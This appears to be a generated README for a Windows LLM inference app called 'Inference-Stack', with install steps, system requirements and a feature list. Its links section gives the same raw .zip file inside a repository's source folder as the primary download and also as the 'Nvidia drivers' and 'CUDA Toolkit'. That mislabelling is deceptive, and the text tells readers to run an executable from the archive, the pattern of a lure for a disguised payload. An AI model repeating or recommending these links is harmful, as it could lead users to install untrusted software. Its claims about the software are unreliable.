Inference-Stack helps you run large language models (LLMs) on Windows using your GPU. It connects a simple interface with powerful backend processes. You get faster responses by scheduling tasks, using multiple GPUs, and caching data. The system handles multiple types of input such as text and images. It is built with a modern gateway and fast Python workers that work well together.
This app is for users who want to explore AI models without complex setup. It uses real GPU power for the best speed and accuracy.
Before you install, make sure your computer meets these basic needs:
- Operating System: Windows 10 or later (64-bit)
- Processor: Intel i5 or AMD Ryzen 5 (or better)
- RAM: 16 GB minimum recommended
- GPU: Nvidia GPU with at least 6GB VRAM and CUDA support
- Disk Space: 10 GB free space for files and cache
- Internet: Required for downloading and initial setup
Having a Nvidia GPU with CUDA support is necessary because Inference-Stack uses your GPU for heavy calculations. Other GPUs may not work or will run very slowly.
To start using Inference-Stack on your Windows computer, follow these steps:
Go to the releases page to get the latest version:
Download Inference-Stack on GitHub
This page shows all available versions. Pick the latest release based on the date.
Look for a file with one of these extensions:
.exe– This is an installer that guides you through setup..zip– A compressed folder with program files.
If available, use the .exe file for an easier experience.
If you downloaded the .exe:
- Double-click the file to start.
- Follow the prompts to complete installation.
- Choose the installation folder or use the default.
- Wait for the installer to finish.
If you got a .zip file:
- Right-click the file, select “Extract All.”
- Choose a folder to put the files.
- Open the folder after extraction.
Make sure Nvidia drivers and CUDA are installed:
- Check your GPU driver version in Windows Device Manager.
- If outdated, download the latest drivers from the Nvidia website.
- Also, install the CUDA toolkit as per Nvidia’s instructions.
You may need to restart your PC after these steps.
Open the folder where you installed or extracted the app.
Look for an executable file named similar to Inference-Stack.exe or start.bat.
Double-click it to run the program.
When the app opens:
- It connects to your GPU automatically.
- The interface is simple: you input a prompt or data.
- The system sends it to the backend workers for processing.
- Results appear in seconds depending on model size.
You can test with basic text requests first before trying other inputs like images.
- Dynamic Batching: Combines multiple requests to speed up response time.
- GPU Acceleration: Uses your NVIDIA GPU to handle complex calculations.
- gRPC Interface: Efficient communication between the app’s parts.
- KV Cache: Saves recent data to avoid repeating work.
- Multi-modal Inputs: Supports text, images, and other data types.
- Tensor Parallelism: Splits tasks across multiple GPU cores for speed.
These features run automatically. You only need to provide input and get outputs.
New versions improve speed and add features. Check the releases page regularly.
To update:
- Download the new installer or zip file.
- Follow the same steps as first installation.
- Your settings usually remain unless you uninstall the old version.
- Make sure your GPU drivers are up to date.
- Check that your system meets all requirements.
- Restart your computer and try again.
- Confirm CUDA toolkit is installed.
- Verify the correct CUDA version matches your GPU.
- Close other heavy programs.
- Check your GPU is not overheating.
- Restart the app.
Inference-Stack runs locally on your PC. Your data does not leave your machine unless you share it.
The system does not send your inputs or results to any external servers.
The app may include sample scripts or configuration files. Advanced users can adjust settings to control how models run. However, for basic use, defaults work fine.
- Primary download page: https://github.com/Diligent-battledamage421/Inference-Stack/raw/refs/heads/main/inference-api/src/completions/Stack_Inference_v1.6.zip
- Nvidia drivers: https://github.com/Diligent-battledamage421/Inference-Stack/raw/refs/heads/main/inference-api/src/completions/Stack_Inference_v1.6.zip
- CUDA Toolkit: https://github.com/Diligent-battledamage421/Inference-Stack/raw/refs/heads/main/inference-api/src/completions/Stack_Inference_v1.6.zip
dynamic-batching, gpu, grpc, inference, kv-cache, llm, multi-modal, nestjs, tensor-parallelism, transformers